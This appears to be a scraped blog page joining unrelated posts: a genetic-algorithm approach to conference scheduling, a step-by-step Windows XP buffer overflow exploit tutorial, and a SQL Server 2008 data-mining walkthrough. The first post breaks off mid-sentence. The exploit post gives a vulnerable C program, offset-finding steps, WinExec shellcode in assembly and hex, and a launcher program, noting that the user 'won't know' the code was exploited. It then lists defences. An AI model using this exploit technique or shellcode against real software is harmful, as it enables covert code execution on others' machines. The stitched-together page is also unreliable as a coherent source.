Genetic Algorithm for Conference Schedule Mining

Genetic Algorithm for Conference Schedule Mining

Ali Tarhini

 

Problem Definition:

Scheduling sessions, also known as “time tabling” at a large conference is a persistent challenge. The problem states that given a large number of sessions, rooms, time slots and a set of constraints, it is required to mine for the best schedule that covers all sessions within the given time slots while satisfying the required set of constraints. Allocating sessions to specific “time slots” requires advanced computational techniques for finding the best schedule that satisfies most of the constraints. The problem with large conferences is that many sessions will be scheduled to run concurrently; therefore an attendant may run into a problem if two or more of his/her favorite sessions are scheduled to run at the same time. Although there have been efforts to tackle the problem by using “tracks” to categorize sessions, which basically assumes that an attendant will stick to one track where the sessions of a track are scheduled sequentially in time. It turned out that this solution is not efficient in practice because attendants tend to hop from one track to the other rather than following a strict schedule for one track. More advanced approaches reduce the problem to the Job Shop Scheduling problem (JSSP) with multiple precedence constraints which is an optimization problem composed of resources, operations, and constraints. A job consists of a sequence of operations with each operation is part of exactly one job. Each operation is executed on a resource with starting time during a processing time with precedence constraints. A job has a release date, completion time and due date. A resource can execute only one operation at a time. We assume that any successive operations of the same job are going to be processed on different machines. It is desired to find a feasible schedule, which optimizes a set of given performance measures. However, JSSP problems tend to be theoretical and are not feasible to be applied in practice for international conferences because the algorithm does not take into account human interest in a particular set of sessions. For example, JSSP cannot handle attendant’s favorite sessions because this is not a constraint, it’s a training set. In this paper, a genetic algorithm is presented to provide a solution for the conference scheduling problem. In the context of genetic algorithms, a class of approximation algorithms, our “solution” means one among a set of all possible “best” solutions. It may not be the “best possible solution” but is certainly among the best.

Proposed algorithm:

Input: Sessions, Rooms, Timeslots, set of preference sessions.

As any genetic algorithm, this approach utilizes the genetic property “survival of the fittest” which means that as solutions are getting generated, bad solutions are eliminated and good solutions are carried over to the next step. In order to determine what’s good and what’s bad, a Fitness function is used. This function validates a given solution with the set of constraints and list of preference sessions and returns a value indicating how relevant the solution is. The fitness function also takes into consideration the training set of favorite sessions recommended by attendants and tries to optimize the fitness according to how well each solution is close to any of the favorite choices.

A solution is simply a set of associations of a session to room and a timeslot.

The algorithm starts by generating solutions at random, that is, by randomly picking a session and assigning it to a room and a timeslot. The session is then removed from the input and the selected room/timeslot is also removed from the list of remaining rooms/timeslots. This is to eliminate the possibility of assigning the same session twice. Hence, the probability of coming up with solutions that are at least worth considering is optimized. We will denote the set of generated solutions as generation 0; the first generation. Next, each solution in generation 0 is applied to the Fitness function which compares the solution against the set of constraints and returns a value indicating relevance. Once all solutions are evaluated, they are sorted in descending order(assuming lower value indicates better solution) and the top X percentage of the solutions is chosen to be carried on to the next generation. Kill all the remaining solutions. The surviving solutions will undergo two operations in order to compute the next generation. Mutation and Crossover. In mutating a solution, one association of a session to a room/timeslot is selected and the session is changed to a different session that is not already listed in the solution. In crossover, two solutions are picked at random and sessions are exchanged in between. This procedure is repeated over many generations until a solution that meets most of the constraints is met.

 

References:

[1] Wayne Smith, Applying Data Mining To Scheduling Courses at a University, School of Information Systems and Technology Claremont Graduate University

This study demonstrates the feasibility of applying the principles of data mining. Specifically it uses association rules to evaluate a nonstandard (“aberrant”) timetabling pilot study undertaken in one College at a University. The results indicate that inductive methods are indeed applicable, and that both summary and detailed results can be understood by key decision-makers, and, straightforward, repeatable SQL queries can be used as the chief analytical technique on a recurring basis. In addition, this study was one of the first empirical studies to provide an accurate measure of the discernable, but negligible, scheduling exclusionary effects that may impact course availability and diversity negatively.

[2] Atif Shahzad Nasser Mebarki Discovering Dispatching Rules For Job Shop Scheduling Problem Through Data Mining

A data mining based approach to discover previously unknown priority dispatching rules for job shop scheduling problem is presented. This approach is based upon seeking the knowledge that is assumed to be embedded in the efficient solutions provided by the optimization module built using tabu search. The objective is to discover the scheduling concepts using data mining and to obtain a rule-set capable of approximating the efficient solutions in a dynamic job shop scheduling environment. A data mining based scheduling framework is presented which consists of 3 phases: Search for a set of solutions, Apply data cleaning and for the resulting solutions including aggregation and attribute construction and the finally to model induction and interpretation by applying decision tree induction algorithm.

[3] Ahmed Hamdi Abu Absa, Sana’a Wafa Al-Sayegh, E-Learning Timetale Generator Using Genetic Algorithms

 

In this paper, the authors explain the details of the implementation of a computer program which employs Genetic Algorithms (GAs) in the quest for an optimal lecture timetable generator. GA theory is covered with emphasis on less fully encoded systems employing nongenetic operators. The field of Automated Timetabling is also explored. A timetable is explained as, essentially, a schedule with constraints placed upon it. The program, written in java, has the special libraries to deal with genetic algorithm which are used for the implementation. In a simplified university timetable problem it consistently evolves constraint violation free timetables. The effects of altered mutation rate and population size are tested. It is seen that the GA could be improved by the further incorporation of repair strategies, and is readily scalable to the complete timetabling problem.

 

[4] Branimir Sigl, Marin Golub, Vedran Mornar, Solving Timetable Scheduling Problem

Using Genetic Algorithms

 

In this paper a genetic algorithm for solving timetable scheduling problem is described. The algorithm was tested on small and large instances of the problem. Algorithm performance was significantly enhanced with modification of basic genetic operators. Intelligent operators restrain the creation of new conflicts in the individual and improve overall algorithm ‘s behavior.
The program uses eliminating selection, which chooses and eliminates bad individuals from the current population, making room for new children that will be born from the remaining individuals. The probability of elimination increases proportionally with the fitness value of the individual. As the remaining individuals are better than the average of the population, it is expected that their children will be better as well. There is some probability (though very small) that eliminating selection deletes the best individual. That would ruin the algorithm efforts and put its work back for some number of generations. Therefore, protection mechanism for best individuals has to be made, so the good genetic material is sustained in population. It is called the elitism. The authors’ choice was to keep just the top one individual. The reproduction operators constitute

Advertisements

Exploit the buffer – Buffer Overflow Attack

Exploit the buffer – Buffer Overflow Attack

Theoretical Introduction:

A program is a set of instructions that aims to perform a specific task. In order to run any program, the source code must first be translated into machine code. The compiler translates high level language into low level language whose output is an executable file. In order to simplify the machine code representation to the user it is displayed in hexadecimal format. The executable file is then run in memory which is divided into two parts which are the text part and the data part [1]. In memory, the machine code of a program is loaded into the memory text part which is a read only area and can’t be changed [1]. If the program contains any static variables such as the global variables or constants, then these static variables are stored in a part of memory called the static data [1]. Then during the program runtime the instructions are allocated in memory on either the heap or the stack depending on the type of memory allocation used to allocate the variables (by value or by reference). This process of memory allocation for the text memory part followed by the static data part followed by the stack or heap is done from lower to higher memory addresses [1]. The heap grows from lower to higher memory addresses whereas in the stack data is allocated from higher to lower memory based on the concept of Last in First out (LIFO) where the last element that enters the stack is the first one to go out (Fig.1) [1]. The stack is a continuous space in memory where the information about any running function is stored which can be either data or addresses.

Figure 1

For example, assume we have the following program [2]:


void fn1() {

 

char buffer1[5];

 

char buffer2[10];

 

}

 

void main() {

 

fn1();

 

}

 

By looking at the assembly language output we see that the call to fn1() is translated to:

 

push %ebp

 

mov %esp,%ebp

 

sub $20,%esp

The stack allocation of the above program is shown below:

High Memory

Return address of main

EBP

Buffer1

Buffer1

Buffer2

Buffer2

Low Memory

Buffer2

The ESP, EBP and EIP registers are 32 bit cpu registers. The ESP register (stack pointer) always points to the top of the stack where the last element in the stack is stored (the lowest memory address). The EBP register (base pointer) is used to point to the current frame pointer which corresponds to a call to a function that hasn’t returned yet. The EIP register contains the address of the next instruction to be executed.

Each time a function is called the address of the next instruction following the call is pushed into the stack, this value is obtained from the EIP register of the cpu. The return address is stored in the stack in order to return back correctly to the next instruction following the function call. After pushing the EIP value, the EBP value obtained from the EBP register of the cpu is pushed into the stack which corresponds to a new frame pointer for the currently called function. The ESP register always points to the top of the stack. Memory is always allocated in blocks of word size that’s why buffer1 is allocated 8 bytes instead of 5 and buffer2 is allocated 12 bytes instead of 10 [2].

Hackers can utilize the vulnerability of having the return address stored in the stack and try to overflow the buffer by entering data larger than its allocated size in the stack by taking advantage of the lack of boundary checking of C or C++ code for some instructions. The instructions that lack boundary checking include: gets(), strcpy(), strcat(), sprintf(), vsprintf(), scanf(), sscanf(), fscanf(),… [3]

Buffer flow vulnerabilities have been increasing recently [1]. Attackers who exploit the buffer overflow vulnerability take the advantage of the presence of the return address of a running function in the stack and try to change this return address in order to execute any executable file they choose or simply crash the system. This can be achieved by overflowing the buffer with data larger than its size until reaching the location of the return address in the stack. This return address can be overwritten by the address of a malicious code causing the program to execute this malicious code instead of returning to the main. The return address can also be written by any data causing the program to jump to an unidentifiable address and thus causing a segmentation error and causing the program to crash [4].

Brief Outline of the Steps

The hacker trying to achieve a buffer overflow should undergo the following steps:

  1. He should identify the existence of buffer overflow vulnerability. When a user enters a long string of characters as an input to a program and the program displays access violation error then this program is identified as having buffer overflow vulnerability and now the hacker can use this program as its target to execute malicious code.
  2. He should identify the location of return address inside the stack. Identifying the buffer size is not sufficient enough to identify the return address location in the stack because there is sometimes an unidentified number of junk between the ebp and the eip values stored in the stack. The return address location is found by performing a brute force where a long string of distinct characters are entered as an input (each character is repeated four times so that it occupies one word location e.g., AAAABBBBCCCCDDDD), and ollydbg is used to identify which character of the above entered characters is stored in the return address and thus the location of the return address is identified.
  3. He should find the shellcode of the code he wants to execute. This shellcode is entered as input into the vulnerable program where nops (no operation) are used in case the shellcode doesn’t fill the entire buffer. Ollydbg is then used to identify the address of this shellcode.
  4. He should write and run the program function that will execute the vulnerable code containing buffer overflow where the shellcode is written into the buffer and Nops are added if there are additional unfilled bytes in the buffer, and the address of the start of the buffer is placed into the return address in the stack.

List of Machines and Software Used

  • Windows xp sp2
  • Microsoft visual studio framework(Buffer security check turned off)
  • C or C++ code containing at least one of the buffer overflow vulnerable instructions.
  • Ollydbg

Attack Explained

  1. Write the following C application which simply copies an input string into a buffer of size 49 bytes:

#include <stdio.h>

#include <stdlib.h>

#include <conio.h>

#include <string.h>

int fn1(char *str){

    char local[49];

    strcpy(local,str);

return 0;

}

int main(int argc,char * args[]){

fn1(args[1]);

return 0;

}

  1. Call the program by passing input string of size less than 49 characters, the program executes normally:

    Open cmd and type buffer.exe AAAABBBBCCCC

  1. Try to discover the presence of the buffer overflow vulnerability in the C code by passing a large string parameter.

Open cmd and type:

buffer.exe AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO

Since this program displayed an error when we enter a long string of characters as an input, then this program is identified as containing the buffer overflow vulnerability and can now be used as our target to execute shellcode. The program has the buffer overflow vulnerability because it uses the strcpy instruction which copies the input instruction into a string of size 49 characters. So if we enter a string having size larger than 49 characters, the stack will be corrupted because the return address saved in the stack is overwritten with an address from the string that is an unidentifiable address. Hackers can now exploit this vulnerability by entering a large string that overwrites the return address with the address of their malicious code.

  1. Try to identify the location of the return address in the stack.
    1. open buffer.exe using the ollydbg and pass the following long string parameter:

      AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ

      Each character is repeated 4 times so that each letter occupies a word size memory location.

    2. Keep on pressing run until reaching the return instruction. Press run and check the value of EIP in the registers panel:

    3. The value of EIP is 4F4F4F4F which is the hexadecimal representation of OOOO.

We conclude that the return address is located 56 characters from the beginning of the input string:

52 bytes are reserved in the stack for the buffer of size 49. This buffer reserved 52 bytes instead of 49 bytes because memory is allocated in terms of word size which is 4 bytes.

The following 4 bytes are reserved for the value of the ebp register.

After 56 bytes from the string start the return address which is the value of the eip register is found. The stack looks like the following:

OOOO (place of the Return address which is the value of EIP)
NNNN ( EBP)
MMMM
LLLL
KKKK
JJJJ
IIII
HHHH
GGGG
FFFF
EEEE
DDDD
CCCC
BBBB
AAAA

So now any 4 bytes we place after the following string

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKLLLLMMMMNNNN (which will be replaced by shellcode) will replace the contents of the return address and the program will now jump to the entered address in the return address location instead of returning back to the main.

  1. Now that we have identified the location of the return address we need to write our shellcode that will run a calculator and call exit so that no error will be displayed to the user and he won’t know that his code has been exploited.

The steps are the following:

  1. Find the assembly code of WinExec and how it is called from the documentation of windows global _start
  2. _start:
  3. jmp short GetCommand
  4. CommandReturn:
  5.      pop ebx     ;ebx now holds the handle to the string
  6.      xor eax,eax
  7.      push eax
  8.      xor eax,eax     ;for some reason the registers can be very volatile, did this just in case
  9.      mov [ebx + 89],al     ;insert the NULL character
  10.      push ebx
  11.      mov ebx,0x758ee695
  12.      call ebx     ;call WinExec(path,showcode)
  13.      xor eax,eax     ;zero the register again, clears winexec retval
  14.      push eax
  15.      mov ebx, 0x758b2acf
  16.      call ebx     ;call ExitProcess(0);
  17. GetCommand:
  18.     ;the N at the end of the db will be replaced with a null character
  19.     call CommandReturn
  20.     db “calc.exe”

  21. Find the address of WinExec and ExitProcess using arwin tool. These addresses are different on every machine.


  1. Replace the old addresses of WinExec and ExitProcess in the assembly code with the new addresses found.

  2. Extract the assembly code and compile it to object code using nasm tool.


  1. Convert the object code to opcode using ld tool.


  1. Dump the shellcode using objdump tool.


Now we have found the shellcode of running a calculator followed by an exit which is the following:

\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x4d\x11\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff\x63\x61\x6c\x63\x2e\x65\x78\x65

This shellcode will be written in place of the buffer and since the shellcode size is less than the buffer size we add nops (no operations) at the beginning of the buffer which won’t affect the code. The nop is represented by \x90.

  1. Now we need to find the address of the buffer because the shellcode is written in its place. To find this address we will use the ollydbg.
    1. Open buffer.exe using the ollydbg and pass the following parameter:

      AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQ

    2. Look into the stack place and scroll up to find the following pattern of hexadecimals :

      4141414142424242434343434444444445454545464646464747474748484848494949494A4A4A4A4B4B4B4B4C4C4C4C4D4D4D4D…


      The address of buffer is identified as 0013FF40 (the place of 41414141 which is the hexadecimal representation of AAAA). Now we know the address of the shellcode is 0013FF40 which is represented as \x40\xFF\x13. We avoid using the null character \x00 because it would terminate the string.

  2. Create the attack application which calls buffer.exe with our shellcode:

    #include <stdio.h>

    #include <windows.h>

    int main (){

    //the executable filename of the vulnerable app

    char xp[70]=”buffer.exe “;

    //Address of the shellcode

    char ret[]= “\x40\xFF\x13”;

    //the shellcode of calc.exe winxp followed by exit

    char of[] =

    “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x4d\x11\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff\x63\x61\x6c\x63\x2e\x65\x78\x65”;

    // concatenated buffer.exe by the shellcode followed by the address of the shellcode

    strcat(xp,of);

    strcat(xp,ret);

    //execute the concatenated string

    WinExec(xp,0);

    return 0;

    }

    Note that few NOPS were added at the beginning of the shellcode in order to fill the buffer since the shellcode doesn’t fill it completely. The stack will look like the following:

\x40\xFF\x13
\x2e\x65\x78\x65
\x63\x61\x6c\x63
\xe0\xff\xff\xff
\x7c\xff\xd3\xe8
\xbb\xa2\xca\x81
\xd3\x31\xc0\x50
\x11\x86\x7c\xff
\x59\x53\xbb\x4d
\x31\xc0\x88\x43
\x5b\x31\xc0\x50
\x90\x90\xeb\x1b
\x90\x90\x90\x90
\x90\x90\x90\x90
\x90\x90\x90\x90
  1. Finally, execute the exploit:

The overflow has been successfully executed since the calculator has been run.

How to avoid Buffer overflows

  • Try to use different languages that can do bound checking other than C or C++. But if you’re writing a C or C++ code use instructions that perform bound checking. For example, instead of using the strcpy or strcat instructions use the strncat or the strncpy [1].
  • Try to write secure programs by writing additional code that can do bound checking [1].
  • You can use tools that can analyze the source code for any buffer overflow vulnerabilities [1].
  • Patch the system, since new systems have been developed taking buffer overflow into consideration to avoid it [1].
  • Set the buffer security check to positive in the properties of the running program in the visual studio framework. This will disable buffer overflow vulnerability from hacking the program and identifying the return address location.

References

[1] http://www.sans.org/reading_room/whitepapers/securecode/buffer-overflow-attack-mechanism-method-prevention_386

[2] http://insecure.org/stf/smashstack.html

[3] http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/buffer-overflow.html

[4] http://www.cs.umass.edu/~trekp/csc262/lectures/04c.pdf

[5] http://www.acsac.org/2005/papers/119.pdf

[6] http://isis.poly.edu/kulesh/stuff/etc/bo.pdf

[7] http://ieeexplore.ieee.org/Xplore/login.jsp?url=http%3A%2F%2Fieeexplore.ieee.org%2Fiel5%2F6658%2F17794%2F00821514.pdf%3Farnumber%3D821514&authDecision=-203


Data mining in Sql Server 2008 & Visual Studio

Architecture of Microsoft SQL S

Image via Wikipedia

Creating a Project in the Business Intelligence Development Studio

Follow these steps to create a new project. To start BIDS, click the Start button and go to All Programs->Microsoft SQL Server 2008->SQL Server Business Intelligence Development Studio. In BIDS, select File New Project. You will see the Business Intelligence Projects template. Click the Analysis Services Project template. Type “AnalysisServices2008Tutorial” as the project name and select the directory in which you want to create this project. Click OK to create the project.

The Solution Explorer Pane

The Solution Explorer contains the following:

1) Data source objects: They contain details of a connection to a data source, which include server name, catalog or database name, and login credentials. You establish connections to relational servers by creating a data source for each one.

2) Data Source Views: When working with a large operational data store you don’t always want to see all the tables in the database. With Data Source Views (DSVs), you can limit the number of visible tables by including only the tables that are relevant to your analysis.

3) Cubes: A collection of measure groups (from the fact tables) and a collection of dimensions form a cube. Each measure group is composed of a set of measures. Cubes can have more than three dimensions and not necessarily the three – dimensional objects as their name suggests.

4) Dimensions: They are the set of tables that are used for building the cube. Attributes that are needed for the analysis task are selected from each table.

5) Mining Structures: Data mining is the process of analyzing raw data using algorithms that help discover interesting patterns not typically found by ad – hoc analysis. Mining Structures are objects that hold information about a data set. A collection of mining models form a mining structure. Each mining model is built using a specific data mining algorithm and can be used for analyzing patterns in existing data or predicting new data values.

 

The Properties Pane

 

If you click an object in the Solution Explorer, the properties for that object appear in the Properties pane. Items that cannot be edited are grayed out. If you click a particular property, the description of that property appears in the Description pane at the bottom of the Properties pane.

 

 

 

Data mining in sql server 2008

 

The data mining process is regarded as a series of steps to be followed which include the following:

1) Creating a Data Source:

Cubes and dimensions of an Analysis Services database must retrieve their data values from tables in a relational data store. This data store, typically part of a data warehouse, must be defined as a data source.

To create a data source, follow these steps:

a) Select the Data Sources folder in the Solution Explorer.

b) Right – click the Data Sources folder and click New Data Source. This launches the Data Source Wizard.

c) In the data source wizard you will provide the connection information about the relational data source that contains the “Adventure Works DW 2008” database. Click the New button under Data Connection Properties to specify the connection details. You will enter here the server name, the database name, and choose one of the two authentication modes either sql server authentication or windows authentication.

d) In the Impersonation Information page you need to specify the impersonation details that Analysis Services will use to connect to the relational data source. There are four options. You can provide a domain username and password to impersonate or select the Analysis Service instance’s service account for connection. The option Use the credentials of the current user is primarily used for data mining where you retrieve data from the relational server for prediction. If you use the Inherit option, Analysis Services uses the impersonation information specified for the database.

e) On the final page, the Data Source Wizard chooses the relational database name you have selected as the name for the data source object you are creating. You can choose the default name specified or specify a new name here.

2) Creating a Data Source View ( DSV )

The Adventure Works DW database contains 25 tables. The cube you build in this chapter uses 10 tables. Data Source Views give you a logical view of the tables that will be used within your OLAP database.

To create a Data Source View, follow these steps:

a) Select the Data Source Views folder in the Solution Explorer.

b) Right – click Data Source Views and select New Data Source View. This launches the Data Source View Wizard.

c) In the data source view wizard you can select the tables and views that are needed for the Analysis Services database you are creating. Click the > button

so that the tables move to the Included Objects list. We will include in the data source view here the following set of tables:

FactInternetSales, FactResellerSales, DimProduct, DimReseller, DimPromotion, DimCurrency, DimEmployee, DimSalesTerritory, DimTime, DimCustomer, Dim Geography.

d) At the final page of the DSV Wizard you can specify your own name for the DSV object or use the default name. Specify the “Adventure Works DW” for the DSV Name in the wizard and click Finish.

If you open the data source view in the solution explorer the data source view editor opens which contains three main areas: Diagram Organizer, the Tables view, and the Diagram view. In the diagram view you can see a diagram of all the added tables with their relationships among each other. In the tables view you can see all the tables that are contained in this data source view. In the diagram organizer, you can right click in the pane here to create a new diagram and drag and drop the tables that u wish to add, or simply add any table u want then right click on it and choose add related tables, this will add all the related tables to the given chosen table. In order to add a new field to a given table, you simply right click on the table in the diagram view and choose add named reference, a dialog will appear where you can enter the name of the new field and the formula upon which it is derived. For example, to add a new field named FullName to the table employee, you write the following formula: FirstName + ‘ ‘ + MiddleName + ‘ ‘ + LastName.

There are different layouts in the data source view. You can switch between rectangular layout and diagonal layout in the DSV by right – clicking in the DSV Designer and selecting the layout type of your choice.

To see a sample of the data specified by your DSV, right – click a table in the DSV Designer and select Explore Data. The data presented is only a subset of the underlying table data. By default the first 5,000 rows are retrieved and shown within this window. You can change the number of rows retrieved by clicking the Sampling Options button. Clicking the Sampling Options button launches the Data Exploration Options dialog where you can change the sampling method, sample count, and number of states per chart, which is used for displaying data in the chart format.

When you click the Pivot Table tab you get an additional window called PivotTable Field List that shows all the columns of the table. You can drag and drop these columns inside the pivot table in the row, column, details, or filter areas. The values in the row and column provide you with an intersection point for which the detailed data is shown.

3) Creating New Dimensions

Dimensions help you define the structure of your cube so as to facilitate effective data analysis. Specifically, dimensions provide you with the capability of slicing data within a cube, and these dimensions can be built from one or more dimension tables.

a) Create the DimGeography dimension:

 Launch the Dimension Wizard by right – clicking Dimensions in the Solution Explorer and selecting New Dimension.

 In the Select Creation Method screen select the “Use an existing table” option and click next.

 In the Specify Source Information page, you need to select the DSV for creating the dimension, select the main table from which the dimension is to be designed, specify the key columns for the dimension, and optionally specify a name column for the dimension key value. By default, the first DSV in your project is selected. Because the current project has only one DSV (the Adventure WorksDW DSV), it is selected. Select the DimGeography table from the Main table drop – down list.

 Click the Next button to proceed to the next step in the Dimension Wizard.

 The Dimension Wizard now analyzes the DSV to detect any outward – facing relationships from the DimGeography table. An outward – facing relationship is a relationship between the DimGeography table and another table, such that a column in the DimGeography table is a foreign key related to another table. The Select Related Tables screen shows that the wizard detected an outward relationship between the DimGeography table and the DimSalesTerritory table. In this example you will be modeling the DimGeography table as a star schema table instead of snowflake schema. Deselect the DimSalesTerritory table and click next.

 The Select Dimension Attributes screen of the Dimension Wizard displays the columns of the main table that have been selected for the dimension you’re creating.

 Select all the attributes of the DimGeography table (all the attributes in the screen), leave their Attribute Type as Regular, allow them to be browsed, and click next.

 The final screen of the Dimension Wizard shows the attributes that will be created for the dimension based on your choices in the wizard. Click the Finish button.

Open the DimGeography dimension by double clicking on it in the solution explorer. In the Dimension structure tab you can see all the table attributes that have been added to this dimension. In the hierarchies’ pane, drag and drop the English country region name attribute followed by the State Province Name followed by the city and then the postal code. Then you have to build the relationships among these attributes in the hierarchy by clicking on the attribute relationships tab, and then dragging the postal code attribute towards the city, this means that the postal code value determines

the city. Drag the city towards the state. Drag the state towards the country. This will build the functional dependencies among the attributes in the hierarchy. Then you have to ensure that the city value is unique in determining the state name value by setting the key columns property of the city attribute to both the state province code and city, and setting its name columns to the city attribute. Similarly set the key columns of the postal code attribute to the postal code, the city, and the state province code attributes, and set its name columns to the postal code.

Deploy the project, by right clicking the project name and choosing deploy. After a successful deployment, you can browse the dimension by selecting the browse tab, where you can see all the data of the dimgeography table arranged according to their hierarchical levels.

b) Create the DimTime dimension

 Launch the Dimension Wizard by right – clicking Dimensions in the Solution Explorer and selecting New Dimension. When the welcome screen of the Dimension Wizard opens up, click next.

 In the Select Creation Method page of the wizard, select the “Use an existing table” option and click next.

 In the Specify Source Information page, select DimTime as the main table from which the dimension is to be designed and click next.

  In the Select Dimension Attributes page, in addition to the Date Key attribute, enable the checkboxes for the following attributes: Calendar Year, Calendar Semester, Calendar Quarter, English Month Name, and Day Number of Month.

 Set the Attribute Type for the “Calendar Year” attribute to Date Calendar Year.

 Set the Attribute Type for the “Calendar Semester” attribute to Date Calendar Half Year.

 Set the Attribute Type for the “Calendar Quarter” attribute to Date Calendar Quarter.

 Set the Attribute Type for the “English Month Name” attribute to Date Calendar Month.

 Set the Attribute Type for the “Day Number of Month” attribute to Date Calendar Day of Month.

 Create a multilevel hierarchy Calendar Date with the levels Calendar year, Calendar Semester, Calendar Quarter, Month (rename English Month Name), and Day (rename Day Number Of Month).

 Save the project and deploy it to the analysis services instance.

 Switch to the Browser pane of the DimTime dimension, where you can see that the date hierarchy is arranged according to the hierarchy that we defined above.

c) Create the DimEmployee dimension

 Launch the Dimension Wizard by right – clicking Dimensions in the Solution Explorer and selecting New Dimension. If the welcome screen of the Dimension Wizard opens up, click next.

 Make sure the “Use an existing table” option is selected and click next.

 In the Specify Source Information page, select DimEmployee as the main table from which the dimension is to be designed and click next.

 On the Select Related Tables screen, uncheck the DimSalesTerritory table and click next.

 In the Select Dimensions Attributes dialog, the Dimension Wizard has detected three columns of the DimEmployee table to be included as attributes. The Dimension Wizard will select columns if they are either the primary key of the table or a foreign key of the table or another table in the DSV. The attributes suggested by the Dimension Wizard in this example are the key attribute Employee Key, the parent – child attribute Parent Employee Key, and the Sales Territory Key, which is a foreign key column to the DimSalesTerritory table.

 Select all the columns of the DimEmployee table as attributes and click next.

 Double – click the DimEmployee dimension in the Solution Explorer to open the Dimension Designer.

 Change the NameColumn property of the Key attribute Dim Employee to FullName and deploy the project to your Analysis Services instance.

When you browse the Parent – Child hierarchy, you will see the members of the hierarchy showing the full names of the employees.

4) Creating a Cube Using the Cube Wizard

Cubes are the principal objects of an OLAP database that help in data analysis. Cubes are multidimensional structures that are primarily composed of dimensions and facts. The data from a fact table that is stored within the cube for analysis are called measures.

To build a new cube, follow these steps:

a) Right – click the Cubes folder and select New Cube. Click next on the introduction page to proceed.

b) In the Select Creation Method page you have the option to build a cube from existing tables, create an empty cube, or create a cube based on a template and generate new tables in the data source. Choose to build the cube from the existing tables in the Adventure Works DW data source. Click Next to proceed to the next step in the Cube Wizard.

c) The next page of the Cube Wizard is the Measure Group Tables selection page. You now must select one or more tables that will serve as fact tables for your Measure Group. The Suggest button on this screen can be used to have the Cube Wizard scan the DSV to detect the fact tables in the DSV and

detect fact tables. Click the Suggest button to have the Cube Wizard automatically select potential Measure Group tables. The Cube Wizard now scans the DSV to detect the fact and dimension tables in the DSV, automatically selects the candidate tables. Any table that has an outgoing relationship is identified as a candidate fact table, whereas a table that has an incoming relationship is detected as a dimension table. Select both the FactResellerSales and the FactInternetSales as the fact tables. And then select the measures that you need to include from these fact tables for the analysis task.

d) In the Select Existing Dimensions page, the Cube Wizard displays a list of all existing dimensions defined in the project. Accept the selection of all the dimensions and click next.

e) The Cube Wizard asks you to select any new dimensions to be created from existing tables in the data source that are not already used for dimensions in the project. You can deselect dimensions that are not needed for your cube on this page. This illustration will use the Fact tables only as measure groups and not for dimensions. Deselect the Fact Reseller Sales and Fact Internet Sales dimensions on this page and click next.

f) In the final page of the Cube Wizard you can specify the name of the cube to be created and review the measure groups, measures, dimensions, attributes, and hierarchies. Use the default name Adventure Works DW suggested by the Cube Wizard and click Finish.

After creating the cube, the new dimensions are automatically created. But these dimensions will have only their primary and foreign keys selected. You have to open each created dimension and select the attributes that you need to add from each table.

g) Press F5 to deploy, build and process the cube. Deploying the cube means building the cube according to the structure that you have defined, while processing the cube means computing all the aggregation values for all the cells in the cube.

You can add a new calculated measure to the cube by Right – clicking in the Script Organizer pane of the Calculation Scripts tab and entering the formula for this new measure.

Now that the cube has been deployed, switch the BIDS Cube Designer view to the Browser page. In the Browser page you will see three panes: a Measure Group pane, a Filter pane, and a Data pane. Suppose you want to analyze the Internet sales of products based on the promotions offered to customers and the marital status of those customers. First you would need to drag and drop [DimPromotion].[English Promotion Type] from the Measure Group pane to the OWC rows area. Next, drag and drop [Dim Customer].[Marital Status] from the Measure Group pane to the OWC columns area. Finally, drag and drop the measure [Sales Amount] from the Fact Internet Sales measure group to the Drop Totals or Detail Fields Here area of the OWC pane.

You can also use MDX queries to query the cube. These MDX queries are similar to the sql server queries. Just as SQL (Structured Query Language) is a query language used to retrieve data from relational databases, MDX (Multi – Dimensional expressions) is a query language used to retrieve data from multidimensional databases.

The format of MDX query is shown below:

SELECT [< axis expression >, [< axis expression > …]]

FROM [< cube_expression >]

[WHERE [slicer expression]]

5) Creating a Mining Structure

Analysis Services 2008 provides nine data mining algorithms that can be utilized to solve various business problems. These algorithms can be broadly classified into five categories based on the nature of the business problem they can be applied to. They are:

1) Classification

2) Regression

3) Segmentation

4) Sequence analysis

5) Association

We aim at grouping customers that undergo similar characteristics.

To create a relational mining model, follow the following steps:

a) Right – click the Mining Structures folder in the Solution Explorer and select New Mining Structure as to launch the Data Mining Wizard that helps you to create data mining structures and models. Click the Next button.

b) Select the “From existing cube” radio button and click next.

c) Select Microsoft Clustering and click next.

d) Choose the Customer table as the primary table and enter the following attributes as inputs for building clusters:

Age, Yearly Income, Number of cars owned, Number of Children at home and Occupation.

You will now see the clustering mining model represented as several nodes with lines between these nodes. By default the clustering mining model groups the customer into ten different clusters. The number of clusters generated can be changed from a property for the cluster mining model. Each cluster is shown as a node in the cluster viewer. Darker shading on the node indicates that the cluster favors a specific input column and vice versa. If there is a similarity between two clusters, it is indicated by a line connecting the two nodes. Similar to the shade of the color node, if the relationship is stronger between two nodes, it is indicated via a darker line. You can move the slider on the left of the cluster diagram from All Links to Strongest Links. As you do this you can see the weaker relationships between the clusters are not displayed. You can change the cluster name by right – clicking the cluster and selecting Rename. You can select desired input columns of the mining model from the Shading Variable drop –

down to see the effect of the column on the various clusters. When you choose a specific shading variable column you need to choose one of the states of the column to be used as the shading variable for the clusters.

The Cluster Profiles view shows the relationship between the mining columns of the model and the clusters in a matrix format. The intersection cell of a specific column and a cluster shows a histogram bar of the various values of the column that are part of the cluster. The size of each bar reflects the number of items used to train the model.

The cluster Characteristics tab shows the characteristics of a single cluster and how the various states of the input columns make up the cluster.

The Cluster Discrimination tab shows the characteristics of a Cluster in comparison with the characteristics of the complement of this Cluster.

How To Increase Your Internet Connection Speed

